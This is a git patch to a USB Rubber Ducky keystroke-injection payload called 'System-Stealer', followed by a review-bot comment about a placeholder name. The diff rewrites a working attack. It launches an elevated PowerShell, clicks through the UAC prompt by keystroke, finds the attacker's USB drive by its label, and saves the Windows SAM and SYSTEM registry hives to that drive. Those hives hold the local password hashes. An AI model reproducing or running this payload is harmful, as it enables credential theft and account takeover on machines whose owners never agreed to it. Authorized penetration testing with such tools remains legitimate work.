From 61eb88ab6c0b5e52ce7aafa6283483bce9fc8148 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Tue, 22 Oct 2024 14:41:32 -0400
Subject: [PATCH] Update payload.txt

---
 .../exfiltration/System-Stealer/payload.txt | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt
index 85d2db0..23fdd6c 100644
--- a/payloads/library/exfiltration/System-Stealer/payload.txt
+++ b/payloads/library/exfiltration/System-Stealer/payload.txt
@@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
 END_IF
 END_REM
 END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
 IF ($_OS == WINDOWS) THEN
- INJECT_MOD GUI R
+ GUI r
 DELAY 500
- STRING cmd
+ STRING powershell
 DELAY 1000
 CTRL-SHIFT-ENTER
 DELAY 750
 LEFT
 ENTER
 DELAY 1000
- REM Change $DRIVELABEL to the storage label of your duck
- DEFINE #DRIVELABEL D:
- STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
+ STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+ DELAY 250
+ STRINGLN reg save HKLM\sam $DriveLetter/sam.save
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
- STRINGLN reg save HKLM\system #DRIVELABEL/system.save
+ STRINGLN reg save HKLM\system $DriveLetter/system.save
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
+ ALT F4
 ELSE
+ ATTACKMODE OFF
 STOP_PAYLOAD
 END_IF
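Review bot: The REM comment added at the top of the hunk names the placeholder as `$DRIVELABEL`, while the DEFINE on the following line and the WQL query later in the hunk use `#DRIVELABEL`, so a reader editing the wrong token gets no effect. The comment was carried over from the old block and just moved; the mismatch already existed there. Change it to `REM Change #DRIVELABEL to the storage label of your duck` so the comment matches the identifier it describes.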